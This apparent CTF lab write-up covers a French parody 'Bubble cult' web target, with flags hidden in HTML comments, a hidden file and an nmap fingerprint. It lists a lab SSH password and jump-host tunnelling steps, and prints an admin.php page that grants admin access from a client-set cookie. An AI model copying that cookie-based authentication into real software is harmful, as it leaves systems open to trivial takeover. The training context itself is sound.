        h2 { color: #5f9ea0; }
        .testimonial { font-style: italic; margin: 20px 0; }
        .author { font-weight: bold; }
    </style>
</head>
<body>
    <div class="navbar">
        <a href="index.php?p=bulle">Accueil</a>
        <a href="index.php?p=admin">Admin</a>
    </div>
    <div class="content">
        <h1>Chers adeptes de la Bulle</h1>
        <!--4f 6d 23 66 70 c9 a2 73 6a 72 22 6b 61 77 ce ec 3f 63 6e 6e-->
        <p>Bienvenue sur notre blog sacré, le seul endroit en ligne où la clarté et la transparence prennent un sens littéral. Je suis votre humble et vénéré guide, le Maître des Bulles, et aujourd'hui, je souhaite vous éclairer sur notre mission sacrée et nos pratiques quotidiennes. Asseyez-vous confortablement dans votre bulle (gonflée à la pression recommandée, bien sûr), et laissez-moi vous emmener dans un voyage spirituel hors du commun.</p>
        <h2>Le Pouvoir de la Bulle</h2>
        <p>Pourquoi la Bulle, me demandez-vous? Ah, mes chers disciples, c’est parce que la bulle est l’incarnation même de la pureté et de l’élévation spirituelle. Contrairement aux gens ordinaires qui se contentent de respirer l'air pollué de la réalité, nous, les élus, flottons dans une bulle d’air pur et d'idées lumineuses. C'est dans cette bulle que nous trouvons la paix intérieure, la clarté mentale, et une très légère sensation de vertige.</p>
        <h2>Les Rituels Sacrés</h2>
        <p>Chaque matin, nous débutons notre journée par le Rituel du Souffle, où nous gonflons soigneusement notre bulle personnelle en utilisant la pompe sacrée (disponible dans notre boutique en ligne). Respirez profondément, sentez l'air entrer dans vos poumons, et soufflez lentement dans votre bulle. Répétez jusqu'à atteindre l'illumination... ou jusqu'à ce que vous ayez besoin de reprendre votre souffle.</p>
        <h2>Les Commandements de la Bulle</h2>
        <ol>
            <li>Tu ne feras pas éclater ta bulle, sauf en cas d’urgence spirituelle (ou de chaton mignon).</li>
            <li>Tu gonfleras ta bulle avec amour et respect, en utilisant seulement l'air le plus pur et les pompes approuvées par le Maître des Bulles.</li>
            <li>Tu flotteras avec grâce, évitant les obstacles matériels et les esprits négatifs.</li>
            <li>Tu propageras l'enseignement de la Bulle, en convertissant doucement (mais fermement) tes proches et voisins.</li>
        </ol>
        <h2>Témoignages</h2>
        <p class="testimonial">"Depuis que j'ai rejoint la Secte de la Bulle, ma vie a littéralement décollé!" - <span class="author">Jeanne, disciple de la Bulle</span></p>
        <p class="testimonial">"Je n'avais jamais ressenti une telle légèreté, sauf peut-être après un buffet à volonté." - <span class="author">Pierre, apôtre de l'Air</span></p>
        <h2>Rejoignez-nous!</h2>
        <p>Si vous sentez que votre vie manque d'élévation, que vos pensées sont trop ancrées dans la réalité ou que vous avez simplement envie de flotter un peu, rejoignez-nous! Nos portes (et nos bulles) sont grandes ouvertes. Venez découvrir la sérénité de la Bulle et laissez-vous emporter par notre courant d'air sacré.</p>
        <p>En attendant notre prochain grand souffle collectif, restez légers et bien gonflés!</p>
        <p>Votre Maître des Bulles,<br>
        Flottant avec sagesse et sérénité</p>
        <!-- FLAG{4h...C0mm3nts...} -->
    </div>
</body>
</html>
```

---

## [Flag] Registry key in the AD

`FLAG{r3gizi}`

```powershell
# Look for any registry key named RebootRequired under HKLM and, if one exists,
# create a marker file.
if (@(Get-ChildItem HKLM: -Recurse | Where-Object { $_.PSChildName -eq 'RebootRequired' })) {
    # Something was returned: create the file
    New-Item C:\Candi\RebootRequired.txt -ItemType File
}
```

---

## [Info] SSH 192.168.0.123

![image](https://hackmd.io/_uploads/SkYoa_VNR.png)

![image](https://hackmd.io/_uploads/r13TPdV4R.png)

| user | password |
|---|---|
| john | uoddsfhhbhkdhhh8 |

```bash
$ ssh -o "ServerAliveInterval 30" -i rebond-privkey -N rebond@infra-05.ipssi.cloud -L 9000:192.168.0.123:22
Enter passphrase for key 'rebond-privkey':

$ ssh -o "ServerAliveInterval 30" -p 9000 john@localhost
The authenticity of host '[localhost]:9000 ([::1]:9000)' can't be established.
ED25519 key fingerprint is SHA256:kTCO1tKcJjEfg+Zxs9uLzX/dGZTzHdYQgLqltUxU5SA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[localhost]:9000' (ED25519) to the list of known hosts.
john@localhost's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 6.8.4-3-pve x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

Last login: Wed May 29 10:00:48 2024 from 192.168.0.2
john@Sect:~$
```

---

## [FLAG] Hidden file in /home/john

`FLAG{7h4tW4s34syr1ght?}`

> /home/john/.flag

```bash
john@Sect:~$ ls -la
total 36
drwxr-x--- 4 john john 4096 May 28 14:41 .
drwxr-xr-x 3 root root 4096 May 28 14:05 ..
-rw------- 1 john john  412 May 29 09:36 .bash_history
-rw-r--r-- 1 john john  220 May 28 14:05 .bash_logout
-rw-r--r-- 1 john john 3771 May 28 14:05 .bashrc
drwx------ 2 john john 4096 May 28 14:41 .cache
-rw-rw-r-- 1 john john   24 May 28 14:07 .flag
drwxrwxr-x 3 john john 4096 May 28 14:07 .local
-rw-r--r-- 1 john john  807 May 28 14:05 .profile
john@Sect:~$ cat .flag
FLAG{7h4tW4s34syr1ght?}
```

---

## [Flag] `FLAG{s3ct4ryBub113s}`

```bash
john@Sect:~$ cat /var/www/html/admin.php
<?php
session_start();

if ($_COOKIE['authenticated'] == '1') {
    echo "Welcome, admin!";
    echo "FLAG{s3ct4ryBub113s}";
} else {
    echo "Tu n'as pas l'air d'être suffisemment dédié à la bulle mon enfant...";
    setcookie("authenticated","0");
}
?>
```

![image](https://hackmd.io/_uploads/SJRoxK44R.png)

![image](https://hackmd.io/_uploads/rkoRgYVVA.png)
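The flag for 192.168.0.123 (section "[Flag] Nmap 192.168.0.123" above) sat inside nmap's wrapped, escaped SF service fingerprint, where it is easy to skim past. As an added example (not code from the write-up), the decoder below joins the SF: lines, undoes nmap's escape syntax, checks each probe's declared length, and reports which probe response actually carries a FLAG; the embedded fingerprint is the one from the scan above, and nothing else about the target is assumed.

```python
"""Decode an nmap service fingerprint (the wrapped "SF:" block printed for an
unrecognized service) back into the raw bytes each probe got in reply.

Added example, not part of the original write-up. NMAP_FINGERPRINT is the
fingerprint from the 192.168.0.123 scan above, copied verbatim.
"""
import re

NMAP_FINGERPRINT = r"""
SF-Port80-TCP:V=7.80%I=7%D=5/29%Time=6656E320%P=x86_64-pc-linux-gnu%r(NULL
SF:,1CD,"HTTP/1\.1\x20200\x20OK\nServer:\x20Bubble\x20Web\x20Server\x203\.
SF:0\nContent-Type:\x20text/html\n\n<!DOCTYPE\x20html>\n<html>\n<body>\n<p
SF:>\ndvztjmff\x20laxhummx\x20qlxzpnsl\x20rqylvzkb\x20xjugxzni\x20blqvzcup
SF:\x20qurhhjty\x20btlxuxar\x20guzdvnlw\x20ydtzinry\x20\n</p>\n<p>\njihqtc
SF:qw\x20xbvsyvlg\x20rllmyzky\x20efxmvome\x20yuxtypqw\x20tlqthbaa\x20mnpmo
SF:bkt\x20hkfeaskz\x20ohumzkks\x20yclhenhs\x20\n</p>\n<p>\ndwhryrkh\x20dsn
SF:ekxfa\x20hzogmzak\x20bnrhbycg\x20xjxxckgg\x20ctmoqroz\x20scfedhoh\x20vf
SF:qygsed\x20bdagpgmr\x20bahtrxtj\x20\n</p>\n<!--Page\x20served\x20by\x20B
SF:ubble\x20Web\x20Server\x203\.00--></body>\n</html>\n")%r(TLSSessionReq,
SF:216,"HTTP/1\.1\x20200\x20OK\nServer:\x20Bubble\x20Web\x20Server\x203\.0
SF:\nContent-Type:\x20text/html\n\n<!DOCTYPE\x20html>\n<html>\n<body>\n<h1
SF:>FLAG{8uBb1es3v3rywh3re}</h1>\n<p>\nrta\x20jie\x20pwf\x20snv\x20qcy\x20
SF:jqb\x20\n</p>\n<p>\najg\x20ivs\x20wiu\x20pqu\x20bhq\x20bsy\x20\n</p>\n<
SF:p>\nhjx\x20nbm\x20itq\x20icj\x20jes\x20rmq\x20\n</p>\n<p>\nmly\x20gaq\x
SF:20cbz\x20ser\x20tmb\x20sze\x20\n</p>\n<p>\nejy\x20vra\x20gbh\x20asv\x20
SF:qeg\x20rmj\x20\n</p>\n<p>\nhrm\x20jjt\x20aef\x20dwg\x20idp\x20gag\x20\n
SF:</p>\n<p>\nigj\x20pge\x20lxk\x20tqx\x20ezo\x20tiz\x20\n</p>\n<p>\nmlg\x
SF:20toc\x20bwf\x20qeh\x20ynn\x20kcw\x20\n</p>\n<p>\nopt\x20yjl\x20xpk\x20
SF:nit\x20nue\x20vpu\x20\n</p>\n<p>\nzqt\x20hix\x20ohm\x20ctr\x20yhg\x20th
SF:r\x20\n</p>\n<!--Page\x20served\x20by\x20Bubble\x20Web\x20Server\x203\.
SF:00--></body>\n</html>\n");
"""

# One entry per probe: %r(ProbeName,HexLength,"escaped response")
_PROBE_RE = re.compile(r'%r\((\w+),([0-9A-Fa-f]+),"((?:[^"\\]|\\.)*)"\)')
# Single-character escapes nmap uses inside the quoted response.
_SIMPLE_ESCAPES = {"n": 0x0A, "r": 0x0D, "t": 0x09, "0": 0x00, "\\": 0x5C, '"': 0x22}


def unescape_response(s: str) -> bytes:
    """Turn nmap's escaped response text back into the bytes the service sent."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s[i] != "\\" or i + 1 == len(s):
            out.append(ord(s[i]))            # plain character (or dangling backslash)
            i += 1
        elif s[i + 1] == "x":                # \xHH: arbitrary byte
            out.append(int(s[i + 2:i + 4], 16))
            i += 4
        elif s[i + 1] in _SIMPLE_ESCAPES:    # \n \r \t \0 \\ \"
            out.append(_SIMPLE_ESCAPES[s[i + 1]])
            i += 2
        else:                                # \. \( \? ...: escaped metacharacter
            out.append(ord(s[i + 1]))
            i += 2
    return bytes(out)


def parse_fingerprint(text: str) -> dict:
    """Join the wrapped SF lines, then decode and length-check every probe response."""
    # First line is "SF-Port<N>-TCP:<payload>", continuations are "SF:<payload>";
    # the payloads concatenate with nothing in between.
    joined = "".join(ln.strip().split(":", 1)[1]
                     for ln in text.splitlines() if ln.strip().startswith("SF"))
    header = joined.split("%r(", 1)[0]       # V=<version>%I=..%D=<date>%Time=..%P=<platform>
    meta = dict(kv.split("=", 1) for kv in header.split("%"))
    probes = {}
    for name, hexlen, body in _PROBE_RE.findall(joined):
        data = unescape_response(body)
        declared = int(hexlen, 16)            # nmap states the response length in hex
        probes[name] = {"declared_len": declared, "data": data,
                        "length_ok": len(data) == declared}
    return {"meta": meta, "probes": probes}


def flags_per_probe(text: str) -> dict:
    """Map each probe name to the FLAG{...} strings found in its decoded response."""
    return {name: re.findall(rb"FLAG\{[^}]*\}", p["data"])
            for name, p in parse_fingerprint(text)["probes"].items()}
```

Only the TLSSessionReq probe's reply contains the flag; the NULL probe gets the same server banner but a different page, which is why the flag never appears in a plain browser fetch of port 80.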